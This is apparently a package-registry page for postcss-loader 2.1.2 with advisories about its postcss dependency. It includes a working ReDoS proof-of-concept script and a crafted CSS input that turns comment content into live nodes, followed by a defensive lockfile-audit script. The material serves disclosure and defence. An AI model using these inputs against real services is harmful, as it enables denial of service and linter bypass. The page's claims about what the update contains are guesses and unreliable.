PostCSS Loader is a crucial webpack tool enabling developers to seamlessly integrate PostCSS, a powerful CSS transformation tool, into their web development workflows. Version 2.1.2 represents a minor update to the previous stable version, 2.1.1, focusing primarily on internal improvements and bug fixes. Both versions share the same core dependencies, including loader-utils, postcss, postcss-load-config, and schema-utils, ensuring consistent compatibility with key ecosystem tools. The development dependencies also remain identical, reflecting a stable development environment and consistent testing practices using tools like Jest, Standard, and Webpack.
The key difference lies in the dist section: the unpacked size grows slightly, from 28856 bytes in version 2.1.1 to 29244 bytes in version 2.1.2. While seemingly minor, this increase suggests that the newer version contains additional code, whether features, optimizations or refinements, even though the metadata does not document them. The release dates also differ: 2.1.2 was released on March 17, 2018, well after the February 26, 2018 release of 2.1.1. For developers, upgrading to version 2.1.2 is recommended, as it likely includes bug fixes and performance enhancements that improve overall stability, keeping PostCSS Loader a reliable and efficient solution for modern CSS processing within webpack-based projects.
All vulnerabilities related to version 2.1.2 of the package
Regular Expression Denial of Service in postcss
Versions of the postcss package before 7.0.36, or between 8.0.0 and 8.2.13, are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds a CSS string with n repeated, unterminated source-map annotation prefixes.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Measure how parse time grows with the number of repeated prefixes.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
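Both advisories above are defined by version ranges, so the first practical check for a webpack project is which postcss copies its lockfile resolves and whether each falls inside an affected range. The following is an added example, not code from this page or from the postcss project; it assumes a lockfile-v2/v3 style `packages` map, ignores pre-release tags, and reads "between 8.0.0 and 8.2.13" as excluding 8.2.13 (assumed to be the patched release). The sample lockfile is constructed.

```javascript
// Added example (not from the advisory page or the postcss project): check
// resolved postcss versions against the two advisory ranges quoted above.
// Dependency-free so it runs offline; pre-release tags are ignored (assumption).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error("unparseable version: " + v);
  return m.slice(1).map(Number);
}
// Comparator over major.minor.patch: negative, zero or positive.
function compareVersions(a, b) {
  const [pa, pb] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] - pb[i];
  return 0;
}
const lt = (a, b) => compareVersions(a, b) < 0;
const gte = (a, b) => compareVersions(a, b) >= 0;

// Affected ranges as stated in the advisory texts above. "Between 8.0.0 and
// 8.2.13" is read as 8.0.0 <= v < 8.2.13 (assumes 8.2.13 is the patched release).
const POSTCSS_ADVISORIES = [
  { title: "Regular Expression Denial of Service in postcss",
    affected: v => lt(v, "7.0.36") || (gte(v, "8.0.0") && lt(v, "8.2.13")) },
  { title: "PostCSS line return parsing error",
    affected: v => lt(v, "8.4.31") },
];
// Titles of the advisories that apply to one postcss version.
function advisoriesFor(version) {
  return POSTCSS_ADVISORIES.filter(a => a.affected(version)).map(a => a.title);
}

// Walk a lockfile-v2/v3 style "packages" map and report every postcss copy,
// including nested ones under another package's own node_modules.
function auditLock(lock) {
  const report = {};
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === "node_modules/postcss" || path.endsWith("/node_modules/postcss")) {
      report[path] = { version: meta.version, advisories: advisoriesFor(meta.version) };
    }
  }
  return report;
}

// Constructed sample lockfile (not a real project's); versions are illustrative.
const SAMPLE_LOCK = { packages: {
  "node_modules/postcss": { version: "8.4.21" },
  "node_modules/postcss-loader": { version: "2.1.2" },
  "node_modules/postcss-loader/node_modules/postcss": { version: "6.0.23" },
} };
console.log(JSON.stringify(auditLock(SAMPLE_LOCK), null, 2));
```

Nested copies matter because a loader pinned to an old postcss major keeps its own vulnerable copy even when the top-level postcss is current.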